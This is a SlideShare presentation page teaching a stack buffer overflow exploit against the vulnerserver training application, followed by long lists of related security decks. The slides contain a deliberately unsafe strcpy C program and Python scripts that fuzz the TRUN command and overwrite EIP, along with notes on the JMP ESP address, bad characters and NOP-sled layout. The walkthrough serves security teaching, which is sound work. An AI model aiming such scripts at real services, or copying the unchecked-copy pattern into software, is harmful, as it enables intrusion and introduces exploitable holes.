SlideShare a Scribd company logo

Exploiting buffer overflows

Download as ODP, PDF
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
Paul Dutot IEng MIET MBCS CITP OSCP CSTM

This document discusses conducting a buffer overflow attack against a vulnerable program. It describes the stack structure and how overflowing a buffer can overwrite the instruction pointer to redirect execution. Specifically, it shows finding the offset to overwrite the EIP, locating a "JMP ESP" instruction to redirect execution, adding shellcode, and dealing with bad characters. The final buffer structure pushes shellcode onto the stack and redirects to it to execute the attack. However, it notes these attacks should only be tested with explicit permission.

Technology
1 of 34
Disclaimer @cyberkryption The views expressed within this presentation or afterwards are my own and in no way represent my employer. The following presentation describes how to conduct a buffer overflow attack. These attacks are illegal to perform against systems that you do not have explicit permission to test. I assume no responsibility for any actions you perform based on the content of this presentation or subsequent conversations. Caveat: With knowledge comes responsibility
Who am I @cyberkryption
Who is This?
Von Neuman Explained.. Extract from Engineer's minute at www.youtube.com/watch?v=5BpgAHBZgec
Phrack 49
Meet the Stack Each program has it's own stack as a memory structure. Program data such as variable are also saved Data is 'pushed' on to the stack and 'popped' off the stack https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
A Vulnerable 'C' program #include<stdio.h> int main(int argc, char *argv[]) { char buff[20]; printf("copying into buffer"); strcpy(buff,argv[1]); return 0; } We defined a character of size 20 bytes, it reserves some space on the stack We copy the buffer using string copy without checking it's size If we pass more then the buffer size (20 bytes) we get a buffer overflow !!!
Stack Overwrite Data on the stack is overwritten. Extra input overwrites other data in the stack Eventually the instruction pointer is overwritten and we have control!!! https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
Meet the CPU Registers & Pointers CPU Pointers EIP = Points to the next address in memory to be executed ESP = Stack Pointer. EBP = Stack Pointer Base Pointer If we can overwrite EIP we can control execution flow other wise it's a DOS exploit. CPU Registers EAX Accumulator EBX Base Register ECX Counter Register EDX Data Register
Meet vulnserver
Initial Fuzzing #!/usr/bin/python import socket server = '192.168.1.65' port = 9999 length = int(raw_input('Length of attack: ')) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, port)) print s.recv(1024) print "Sending attack length ", length, ' to TRUN .' attack = 'A' * length s.send(('TRUN .' + attack + 'rn')) print s.recv(1024) s.send('EXITrn') print s.recv(1024) s.close()
Initial Fuzzing - Video
Initial Crash - Video
Path to Victory Determine Buffer Length. Any Register pointing to buffer? Locate EIP overwrite offset in buffer. Enough space for shellcode? Determine JMP ESP location ? Resolve any bad characters 'A' *3000 / ESP = Buffer ???????? ???????? ????????
EIP Hunting #!/usr/bin/python import socket server = '192.168.1.65' port = 9999 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, port)) print s.recv(1024) print "Sending Evil Buffer to TRUN ." attack = " < insert cyclic pattern here> " s.send(('TRUN .' + attack + 'rn')) print s.recv(1024) s.send('EXITrn') print s.recv(1024) s.close()
EIP Hunting – Cyclic Pattern Crash
How to Locate EIP Overwrite ● After crash with cyclic pattern, we find characters of 396F4348 overwriting the EIP register ● Metasploit pattern_create.rb to create a cyclic pattern of 3000 non repeating characters. ● Lastly use pattern offset to find EIP overwrite ● Use convert.sh for HEX to ASCII conversion
Locating EIP Offset - Video
EIP Hunting Part II #!/usr/bin/python import socket server = '192.168.1.65' sport = 9999 prefix = 'A' * 2006 eip = 'BBBB' padding = 'F' * (3000 - 2006 - 4) attack = prefix + eip + padding s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, sport)) print s.recv(1024) print "Sending Buffer to TRUN " s.send(('TRUN .' + attack + 'rn')) print s.recv(1024) s.send('EXITrn') print s.recv(1024) s.close()
EIP & Buffer Space Confirmed Buffer Space = 023AFAEB - 023AF9E0 = 980 Bytes
Path to Victory Determine Buffer Length. Any Register pointing to buffer? Locate EIP overwrite offset in buffer. Enough space for shellcode? Determine JMP ESP location ? Resolve any bad characters 'A' *3000 / ESP = Buffer 4 Bytes > 2006 + 980 bytes shellcode EIP Overwite'A' * 2006 Shellcode Buffer Construction ???????? ????????
Determining JMP ESP Memory Location
Path to Victory Determine Buffer Length. Any Register pointing to buffer? Locate EIP overwrite offset in buffer. Enough space for shellcode? Determine JMP ESP location ? Resolve any bad characters 'A' *3000 / ESP = Buffer 4 Bytes > 2006 + 980 bytes shellcode EIP Overwite'A' * 2006 Shellcode Buffer Construction 625011AF in essfunc.dll ????????
The Bad Character Problem Hex Dec Description --- --- --------------------------------------------- 0x00 0 Null byte, terminates a C string 0x0A 10 Line feed, may terminate a command line 0x0D 13 Carriage return, may terminate a command line 0x20 32 Space, may terminate a command line argument Bad Characters break our code when executed on the stack, for example 0x00 will stop our code executing!!
Determining Bad Characters
Determining Bad Characters
Path to Victory Determine Buffer Length. Any Register pointing to buffer? Locate EIP overwrite offset in buffer. Enough space for shellcode? Determine JMP ESP location ? Resolve any bad characters 'A' *3000 / ESP = Buffer 4 Bytes > 2006 980 bytes shellcode EIP Overwite'A' * 2006 Shellcode Buffer Construction 625011AF in essfunc.dll 0x00
Lets Create some Shellcode
Final Buffer Structure & Operation 625011AF EIP Overwite'A' * 2006 ShellcodeNOP Sled JMP ESP Buffer Overflow starts here Execution to 625011AF JMP ESP in 625011AF redirects to NOP SLED Shellcode Runs xCC Breakpoint Breakpoint Activated
Putting it all together
CVE2012-5958 /5959
CVE2012-5958 /5959
Questions ???? TWITTER: @cyberkryption BLOG: cyberkryption.wordpress.com

Recommended

04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)
Alexandre Moneger
 
09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?
Alexandre Moneger
 
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg HuntingSystem Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
sanghwan ahn
 
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...
sanghwan ahn
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters
Alexandre Moneger
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 Egghunter
Ajin Abraham
 
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIPSystem Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
sanghwan ahn
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassembling
Harsh Daftary
 

Recommended

04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)
Alexandre Moneger
 
09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?
Alexandre Moneger
 
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg HuntingSystem Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
sanghwan ahn
 
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...
sanghwan ahn
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters
Alexandre Moneger
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 Egghunter
Ajin Abraham
 
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIPSystem Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
sanghwan ahn
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassembling
Harsh Daftary
 
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters
Alexandre Moneger
 
Translation Cache Policies for Dynamic Binary Translation
Translation Cache Policies for Dynamic Binary TranslationTranslation Cache Policies for Dynamic Binary Translation
Translation Cache Policies for Dynamic Binary Translation
Saber Ferjani
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodes
Amr Ali
 
A Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They DoA Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They Do
sanghwan ahn
 
Attack your Trusted Core
Attack your Trusted CoreAttack your Trusted Core
Attack your Trusted Core
Di Shen
 
From SEH Overwrite with Egg Hunter to Get a Shell!
From SEH Overwrite with Egg Hunter to Get a Shell!From SEH Overwrite with Egg Hunter to Get a Shell!
From SEH Overwrite with Egg Hunter to Get a Shell!
Rodolpho Concurde
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20
DefconRussia
 
Python Programming Essentials - M6 - Code Blocks and Indentation
Python Programming Essentials - M6 - Code Blocks and IndentationPython Programming Essentials - M6 - Code Blocks and Indentation
Python Programming Essentials - M6 - Code Blocks and Indentation
P3 InfoTech Solutions Pvt. Ltd.
 
sponsorAVAST-VB2014
sponsorAVAST-VB2014sponsorAVAST-VB2014
sponsorAVAST-VB2014
Martin Hron
 
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsExploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Ajin Abraham
 
Code Vulnerabilities & Attacks
Code Vulnerabilities & AttacksCode Vulnerabilities & Attacks
Code Vulnerabilities & Attacks
Marcus Botacin
 
Buffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackBuffer overflow – Smashing The Stack
Buffer overflow – Smashing The Stack
Tomer Zait
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20
DefconRussia
 
From front-end to the hardware
From front-end to the hardwareFrom front-end to the hardware
From front-end to the hardware
Henri Cavalcante
 
SFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMU
SFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMUSFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMU
SFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMU
Linaro
 
Perl Usage In Security and Penetration testing
Perl Usage In Security and Penetration testingPerl Usage In Security and Penetration testing
Perl Usage In Security and Penetration testing
Vlatko Kosturjak
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23
DefconRussia
 
ARM Trusted FirmwareのBL31を単体で使う!
ARM Trusted FirmwareのBL31を単体で使う!ARM Trusted FirmwareのBL31を単体で使う!
ARM Trusted FirmwareのBL31を単体で使う!
Mr. Vengineer
 
Raspberry Pi I/O控制與感測器讀取
Raspberry Pi I/O控制與感測器讀取Raspberry Pi I/O控制與感測器讀取
Raspberry Pi I/O控制與感測器讀取
艾鍗科技
 
Return oriented programming (ROP)
Return oriented programming (ROP)Return oriented programming (ROP)
Return oriented programming (ROP)
Pipat Methavanitpong
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
amiable_indian
 
Unix executable buffer overflow
Unix executable buffer overflowUnix executable buffer overflow
Unix executable buffer overflow
Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 

More Related Content

What's hot

05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters
Alexandre Moneger
 
Translation Cache Policies for Dynamic Binary Translation
Translation Cache Policies for Dynamic Binary TranslationTranslation Cache Policies for Dynamic Binary Translation
Translation Cache Policies for Dynamic Binary Translation
Saber Ferjani
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodes
Amr Ali
 
A Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They DoA Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They Do
sanghwan ahn
 
Attack your Trusted Core
Attack your Trusted CoreAttack your Trusted Core
Attack your Trusted Core
Di Shen
 
From SEH Overwrite with Egg Hunter to Get a Shell!
From SEH Overwrite with Egg Hunter to Get a Shell!From SEH Overwrite with Egg Hunter to Get a Shell!
From SEH Overwrite with Egg Hunter to Get a Shell!
Rodolpho Concurde
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20
DefconRussia
 
Python Programming Essentials - M6 - Code Blocks and Indentation
Python Programming Essentials - M6 - Code Blocks and IndentationPython Programming Essentials - M6 - Code Blocks and Indentation
Python Programming Essentials - M6 - Code Blocks and Indentation
P3 InfoTech Solutions Pvt. Ltd.
 
sponsorAVAST-VB2014
sponsorAVAST-VB2014sponsorAVAST-VB2014
sponsorAVAST-VB2014
Martin Hron
 
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsExploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Ajin Abraham
 
Code Vulnerabilities & Attacks
Code Vulnerabilities & AttacksCode Vulnerabilities & Attacks
Code Vulnerabilities & Attacks
Marcus Botacin
 
Buffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackBuffer overflow – Smashing The Stack
Buffer overflow – Smashing The Stack
Tomer Zait
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20
DefconRussia
 
From front-end to the hardware
From front-end to the hardwareFrom front-end to the hardware
From front-end to the hardware
Henri Cavalcante
 
SFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMU
SFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMUSFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMU
SFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMU
Linaro
 
Perl Usage In Security and Penetration testing
Perl Usage In Security and Penetration testingPerl Usage In Security and Penetration testing
Perl Usage In Security and Penetration testing
Vlatko Kosturjak
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23
DefconRussia
 
ARM Trusted FirmwareのBL31を単体で使う!
ARM Trusted FirmwareのBL31を単体で使う!ARM Trusted FirmwareのBL31を単体で使う!
ARM Trusted FirmwareのBL31を単体で使う!
Mr. Vengineer
 
Raspberry Pi I/O控制與感測器讀取
Raspberry Pi I/O控制與感測器讀取Raspberry Pi I/O控制與感測器讀取
Raspberry Pi I/O控制與感測器讀取
艾鍗科技
 
Return oriented programming (ROP)
Return oriented programming (ROP)Return oriented programming (ROP)
Return oriented programming (ROP)
Pipat Methavanitpong
 

What's hot (20)

05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters
 
Translation Cache Policies for Dynamic Binary Translation
Translation Cache Policies for Dynamic Binary TranslationTranslation Cache Policies for Dynamic Binary Translation
Translation Cache Policies for Dynamic Binary Translation
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodes
 
A Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They DoA Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They Do
 
Attack your Trusted Core
Attack your Trusted CoreAttack your Trusted Core
Attack your Trusted Core
 
From SEH Overwrite with Egg Hunter to Get a Shell!
From SEH Overwrite with Egg Hunter to Get a Shell!From SEH Overwrite with Egg Hunter to Get a Shell!
From SEH Overwrite with Egg Hunter to Get a Shell!
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20
 
Python Programming Essentials - M6 - Code Blocks and Indentation
Python Programming Essentials - M6 - Code Blocks and IndentationPython Programming Essentials - M6 - Code Blocks and Indentation
Python Programming Essentials - M6 - Code Blocks and Indentation
 
sponsorAVAST-VB2014
sponsorAVAST-VB2014sponsorAVAST-VB2014
sponsorAVAST-VB2014
 
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsExploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
 
Code Vulnerabilities & Attacks
Code Vulnerabilities & AttacksCode Vulnerabilities & Attacks
Code Vulnerabilities & Attacks
 
Buffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackBuffer overflow – Smashing The Stack
Buffer overflow – Smashing The Stack
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20
 
From front-end to the hardware
From front-end to the hardwareFrom front-end to the hardware
From front-end to the hardware
 
SFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMU
SFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMUSFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMU
SFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMU
 
Perl Usage In Security and Penetration testing
Perl Usage In Security and Penetration testingPerl Usage In Security and Penetration testing
Perl Usage In Security and Penetration testing
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23
 
ARM Trusted FirmwareのBL31を単体で使う!
ARM Trusted FirmwareのBL31を単体で使う!ARM Trusted FirmwareのBL31を単体で使う!
ARM Trusted FirmwareのBL31を単体で使う!
 
Raspberry Pi I/O控制與感測器讀取
Raspberry Pi I/O控制與感測器讀取Raspberry Pi I/O控制與感測器讀取
Raspberry Pi I/O控制與感測器讀取
 
Return oriented programming (ROP)
Return oriented programming (ROP)Return oriented programming (ROP)
Return oriented programming (ROP)
 

Similar to Exploiting buffer overflows

Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
amiable_indian
 
Unix executable buffer overflow
Unix executable buffer overflowUnix executable buffer overflow
Unix executable buffer overflow
Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
Blue Hat IL 2019 - Hardening Secure Boot on Embedded Devices for Hostile Envi...
Blue Hat IL 2019 - Hardening Secure Boot on Embedded Devices for Hostile Envi...Blue Hat IL 2019 - Hardening Secure Boot on Embedded Devices for Hostile Envi...
Blue Hat IL 2019 - Hardening Secure Boot on Embedded Devices for Hostile Envi...
Cristofaro Mune
 
Buffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackBuffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the Stack
ironSource
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
Alexandre Moneger
 
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Vincenzo Iozzo
 
Dive into exploit development
Dive into exploit developmentDive into exploit development
Dive into exploit development
Payampardaz
 
Finding 0days at Arab Security Conference
Finding 0days at Arab Security ConferenceFinding 0days at Arab Security Conference
Finding 0days at Arab Security Conference
Rodolpho Concurde
 
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
NETWAYS
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016
Mikhail Sosonkin
 
Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0
Rodolpho Concurde
 
Offensive cyber security: Smashing the stack with Python
Offensive cyber security: Smashing the stack with PythonOffensive cyber security: Smashing the stack with Python
Offensive cyber security: Smashing the stack with Python
Malachi Jones
 
Exploit development 101 - Part 1 - Null Singapore
Exploit development 101 - Part 1 - Null SingaporeExploit development 101 - Part 1 - Null Singapore
Exploit development 101 - Part 1 - Null Singapore
Mohammed A. Imran
 
Davide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruptionDavide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruption
linuxlab_conf
 
Gameboy emulator in rust and web assembly
Gameboy emulator in rust and web assemblyGameboy emulator in rust and web assembly
Gameboy emulator in rust and web assembly
Yodalee
 
null Pune meet - Application Security: Code injection
null Pune meet - Application Security: Code injectionnull Pune meet - Application Security: Code injection
null Pune meet - Application Security: Code injection
n|u - The Open Security Community
 
Buffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly RequiredBuffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly Required
Kory Kyzar
 
Return Oriented Programming, an introduction
Return Oriented Programming, an introductionReturn Oriented Programming, an introduction
Return Oriented Programming, an introduction
Patricia Aas
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linux
Ajin Abraham
 
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON
 

Similar to Exploiting buffer overflows (20)

Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
Unix executable buffer overflow
Unix executable buffer overflowUnix executable buffer overflow
Unix executable buffer overflow
 
Blue Hat IL 2019 - Hardening Secure Boot on Embedded Devices for Hostile Envi...
Blue Hat IL 2019 - Hardening Secure Boot on Embedded Devices for Hostile Envi...Blue Hat IL 2019 - Hardening Secure Boot on Embedded Devices for Hostile Envi...
Blue Hat IL 2019 - Hardening Secure Boot on Embedded Devices for Hostile Envi...
 
Buffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackBuffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the Stack
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
 
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
 
Dive into exploit development
Dive into exploit developmentDive into exploit development
Dive into exploit development
 
Finding 0days at Arab Security Conference
Finding 0days at Arab Security ConferenceFinding 0days at Arab Security Conference
Finding 0days at Arab Security Conference
 
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016
 
Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0
 
Offensive cyber security: Smashing the stack with Python
Offensive cyber security: Smashing the stack with PythonOffensive cyber security: Smashing the stack with Python
Offensive cyber security: Smashing the stack with Python
 
Exploit development 101 - Part 1 - Null Singapore
Exploit development 101 - Part 1 - Null SingaporeExploit development 101 - Part 1 - Null Singapore
Exploit development 101 - Part 1 - Null Singapore
 
Davide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruptionDavide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruption
 
Gameboy emulator in rust and web assembly
Gameboy emulator in rust and web assemblyGameboy emulator in rust and web assembly
Gameboy emulator in rust and web assembly
 
null Pune meet - Application Security: Code injection
null Pune meet - Application Security: Code injectionnull Pune meet - Application Security: Code injection
null Pune meet - Application Security: Code injection
 
Buffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly RequiredBuffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly Required
 
Return Oriented Programming, an introduction
Return Oriented Programming, an introductionReturn Oriented Programming, an introduction
Return Oriented Programming, an introduction
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linux
 
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
 

More from Paul Dutot IEng MIET MBCS CITP OSCP CSTM

Welcome to the #WannaCry Wine Club
Welcome to the #WannaCry Wine ClubWelcome to the #WannaCry Wine Club
Welcome to the #WannaCry Wine Club
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Scanning Channel Islands Cyberspace
Scanning Channel Islands Cyberspace Scanning Channel Islands Cyberspace
Scanning Channel Islands Cyberspace
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Incident Response in the wake of Dear CEO
Incident Response in the wake of Dear CEOIncident Response in the wake of Dear CEO
Incident Response in the wake of Dear CEO
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Logicalis Security Conference
Logicalis Security ConferenceLogicalis Security Conference
Logicalis Security Conference
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Letter anonymous-II
Letter anonymous-IILetter anonymous-II
Letter anonymous-II
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Practical Cyber Defense
Practical Cyber DefensePractical Cyber Defense
Practical Cyber Defense
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
A Letter from Anonymous to the Jersey Finance Industry
A Letter from Anonymous to the Jersey Finance IndustryA Letter from Anonymous to the Jersey Finance Industry
A Letter from Anonymous to the Jersey Finance Industry
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Infosec lecture-final
Infosec lecture-finalInfosec lecture-final
Infosec lecture-final
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Path to Surfdroid
Path to SurfdroidPath to Surfdroid
Path to Surfdroid
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
WI-FI Security in Jersey 2011
WI-FI Security in Jersey 2011WI-FI Security in Jersey 2011
WI-FI Security in Jersey 2011
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 

More from Paul Dutot IEng MIET MBCS CITP OSCP CSTM (10)

Welcome to the #WannaCry Wine Club
Welcome to the #WannaCry Wine ClubWelcome to the #WannaCry Wine Club
Welcome to the #WannaCry Wine Club
 
Scanning Channel Islands Cyberspace
Scanning Channel Islands Cyberspace Scanning Channel Islands Cyberspace
Scanning Channel Islands Cyberspace
 
Incident Response in the wake of Dear CEO
Incident Response in the wake of Dear CEOIncident Response in the wake of Dear CEO
Incident Response in the wake of Dear CEO
 
